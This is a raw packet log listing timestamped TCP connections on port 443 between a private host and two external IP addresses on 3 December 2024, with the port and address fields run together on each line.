                                                                                                                      Dec 3, 2024 08:55:29.412205935 CET49903443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:29.412205935 CET49903443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:29.592911005 CET44349904196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.592921019 CET44349904196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.593144894 CET49904443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:29.603152990 CET44349903196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.603163958 CET44349903196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.603252888 CET44349902196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.603265047 CET44349903196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.603276014 CET44349902196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.603291988 CET44349902196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.603296041 CET49903443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:29.603332996 CET49903443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:29.603336096 CET49902443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:29.603672028 CET49902443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:29.603672981 CET49903443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:29.603693008 CET44349903196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.603724957 CET49903443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:29.608618975 CET49903443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:29.609767914 CET49926443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:29.609800100 CET44349926196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.610104084 CET49926443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:29.610104084 CET49926443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:29.610140085 CET44349926196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.645553112 CET44349902196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.645560980 CET44349902196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.645586014 CET44349902196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.645608902 CET44349902196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.645616055 CET44349902196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.645636082 CET44349902196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.645638943 CET49902443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:29.645638943 CET49902443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:29.645654917 CET44349902196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.645673990 CET49902443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:29.645704031 CET44349902196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.645979881 CET44349907196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.645996094 CET44349907196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.646024942 CET49902443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:29.646030903 CET44349902196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.646032095 CET44349907196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.646039963 CET44349904196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.646045923 CET44349907196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.646049976 CET44349904196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.646053076 CET44349907196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.646059036 CET49907443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:29.646074057 CET49907443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:29.646086931 CET49902443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:29.646094084 CET44349904196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.646095037 CET44349907196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.646102905 CET44349904196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.646102905 CET44349907196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.646106005 CET44349907196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.646130085 CET49904443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:29.646131039 CET49907443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:29.646142006 CET44349904196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.646156073 CET44349904196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.646174908 CET49907443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:29.646178961 CET49904443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:29.647701979 CET4434990913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.647737980 CET49904443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:29.647743940 CET44349904196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.648603916 CET49904443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:29.648603916 CET49909443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:29.648623943 CET4434990913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.649728060 CET49909443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:29.649733067 CET4434990913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.684562922 CET44349907196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.684699059 CET49907443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:29.706397057 CET44349904196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.706902027 CET49904443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:29.722026110 CET44349904196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.722481012 CET49904443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:29.729573011 CET44349902196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.730772018 CET49902443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:29.731566906 CET4434991113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.733275890 CET44349904196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.733311892 CET49911443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:29.733333111 CET4434991113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.733361006 CET49904443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:29.734962940 CET49911443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:29.734968901 CET4434991113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.736056089 CET44349904196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.736080885 CET4434990813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.736131907 CET49904443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:29.736149073 CET4434990813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.736581087 CET49908443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:29.736581087 CET49908443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:29.736634016 CET49908443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:29.736649990 CET4434990813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.739444971 CET49927443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:29.739465952 CET4434992713.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.739705086 CET49927443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:29.739705086 CET49927443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:29.739739895 CET4434992713.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.741611958 CET44349902196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.742070913 CET49902443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:29.747915030 CET44349904196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.748352051 CET49904443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:29.749628067 CET4434991013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.750530005 CET49910443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:29.750530005 CET49910443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:29.750550032 CET4434991013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.750555038 CET4434991013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.769539118 CET44349902196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.770092010 CET49902443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:29.786138058 CET44349902196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.786556005 CET49902443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:29.798948050 CET44349902196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.799432993 CET49902443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:29.809334040 CET44349902196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.809401035 CET44349902196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.810669899 CET49902443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:29.810697079 CET44349902196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.810725927 CET49902443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:29.825975895 CET44349907196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.828648090 CET49907443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:29.843556881 CET44349907196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.844636917 CET49907443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:29.863850117 CET44349904196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.864666939 CET49904443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:29.874996901 CET44349904196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.876637936 CET49904443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:29.882930040 CET44349907196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.884639025 CET49907443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:29.888461113 CET44349904196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.888633966 CET49904443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:29.898192883 CET44349907196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.900641918 CET49907443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:29.901880980 CET44349904196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.904639006 CET49904443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:29.910904884 CET44349904196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.912640095 CET49904443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:29.917114973 CET44349904196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.919631958 CET44349907196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.919676065 CET49904443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:29.920639038 CET49907443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:29.923912048 CET44349904196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.924638987 CET49904443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:29.930507898 CET44349904196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.931679964 CET49904443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:29.939389944 CET44349904196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.940639019 CET49904443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:29.941167116 CET44349907196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.944641113 CET49907443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:29.946552992 CET44349904196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.948309898 CET49904443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:29.952728033 CET44349904196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.952825069 CET49904443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:29.969500065 CET44349907196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.969590902 CET49907443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:29.989653111 CET44349904196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.989721060 CET49904443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:29.991112947 CET44349907196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.991194010 CET49907443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:29.995907068 CET44349904196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.995974064 CET49904443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:30.005120039 CET44349907196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:30.005218029 CET44349907196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:30.005244970 CET49907443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:30.005295992 CET49907443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:30.006848097 CET44349904196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:30.006937027 CET49904443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:30.014372110 CET44349904196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:30.014455080 CET49904443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:30.035969973 CET49907443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:30.035985947 CET44349907196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:30.060771942 CET44349904196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:30.060868025 CET49904443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:30.065924883 CET44349904196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:30.066003084 CET49904443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:30.101598978 CET4434990913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:30.101623058 CET4434990913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:30.101692915 CET49909443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:30.101705074 CET4434990913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:30.103900909 CET4434990913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:30.103961945 CET49909443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:30.117225885 CET44349904196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:30.117331982 CET49904443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:30.121958971 CET44349904196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:30.122045040 CET49904443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:30.125564098 CET44349904196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:30.125636101 CET49904443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:30.129069090 CET44349904196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:30.129199982 CET49904443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:30.132523060 CET44349904196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:30.132595062 CET49904443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:30.137490988 CET44349904196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:30.137557983 CET49904443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:30.140270948 CET44349904196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:30.140331984 CET49904443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:30.143630981 CET44349904196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:30.143697023 CET49904443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:30.148446083 CET44349904196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:30.148509979 CET49904443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:30.151273012 CET44349904196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:30.151339054 CET49904443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:30.154804945 CET44349904196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:30.154877901 CET49904443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:30.158013105 CET44349904196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:30.158077955 CET49904443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:30.161873102 CET44349904196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:30.161938906 CET49904443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:30.181049109 CET4434991113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:30.181073904 CET4434991113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:30.181170940 CET49911443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:30.181180954 CET4434991113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:30.182216883 CET4434991113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:30.182265997 CET49911443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:30.188587904 CET44349904196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:30.188666105 CET49904443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:30.213299990 CET44349915196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:30.220375061 CET4434991013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:30.220401049 CET4434991013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:30.220519066 CET49910443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:30.220547915 CET4434991013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:30.220599890 CET49910443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:30.224972963 CET4434991013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:30.225032091 CET4434991013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:30.225069046 CET49910443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:30.248338938 CET44349904196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:30.248440981 CET49904443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:30.252300978 CET44349904196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:30.252394915 CET49904443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:30.258274078 CET49915443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:30.258291006 CET44349915196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:30.258718967 CET44349915196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:30.300076962 CET49915443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:30.300154924 CET44349915196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:30.301100969 CET49915443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:30.307611942 CET44349904196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:30.307697058 CET49904443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:30.310610056 CET44349904196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:30.310708046 CET49904443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:30.311408043 CET44349904196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:30.311487913 CET44349904196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:30.311531067 CET49904443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:30.313621998 CET49909443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:30.313636065 CET4434990913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:30.313647032 CET49909443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:30.313656092 CET4434990913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:30.314142942 CET49911443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:30.314146042 CET4434991113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:30.314158916 CET49911443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:30.314162016 CET4434991113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:30.315716028 CET49910443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:30.315731049 CET4434991013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:30.315741062 CET49910443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:30.315746069 CET4434991013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:30.316313028 CET49904443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:30.318790913 CET49904443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:30.318795919 CET44349904196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:30.321026087 CET49929443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:30.321052074 CET4434992913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:30.321122885 CET49929443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:30.321319103 CET49930443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:30.321365118 CET4434993013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:30.321415901 CET49930443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:30.321723938 CET49931443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:30.321732998 CET4434993113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:30.321799040 CET49931443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:30.321948051 CET49929443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:30.321960926 CET4434992913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:30.321994066 CET49930443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:30.322010040 CET4434993013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:30.323990107 CET49931443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:30.324003935 CET4434993113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:30.347357035 CET44349915196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:30.692390919 CET4434991813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:30.693088055 CET49918443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:30.693110943 CET4434991813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:30.693603992 CET49918443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:30.693608046 CET4434991813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:31.016271114 CET44349921196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:31.016762018 CET49921443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:31.016771078 CET44349921196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:31.017085075 CET44349921196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:31.020291090 CET49921443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:31.020354986 CET44349921196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:31.023192883 CET49921443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:31.024297953 CET44349919196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:31.025456905 CET49919443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:31.025465012 CET44349919196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:31.025780916 CET44349919196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:31.026674986 CET49919443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:31.026725054 CET44349919196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:31.028536081 CET49919443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:31.041908979 CET44349915196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:31.041925907 CET44349915196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:31.041980028 CET49915443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:31.041996956 CET44349915196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:31.043859959 CET49915443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:31.043891907 CET44349915196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:31.043936968 CET49915443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:31.046427965 CET49934443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:31.046461105 CET44349934196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:31.046519041 CET49934443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:31.046840906 CET49934443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:31.046858072 CET44349934196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:31.048544884 CET49935443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:31.048569918 CET44349935196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:31.048648119 CET49935443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:31.048826933 CET49935443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:31.048841953 CET44349935196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:31.056909084 CET44349920196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:31.057132959 CET49920443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:31.057148933 CET44349920196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:31.058206081 CET44349920196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:31.058259010 CET49920443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:31.058787107 CET49920443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:31.058854103 CET44349920196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:31.058918953 CET49920443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:31.058928013 CET44349920196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:31.067327023 CET44349921196.22.142.143192.168.2.4
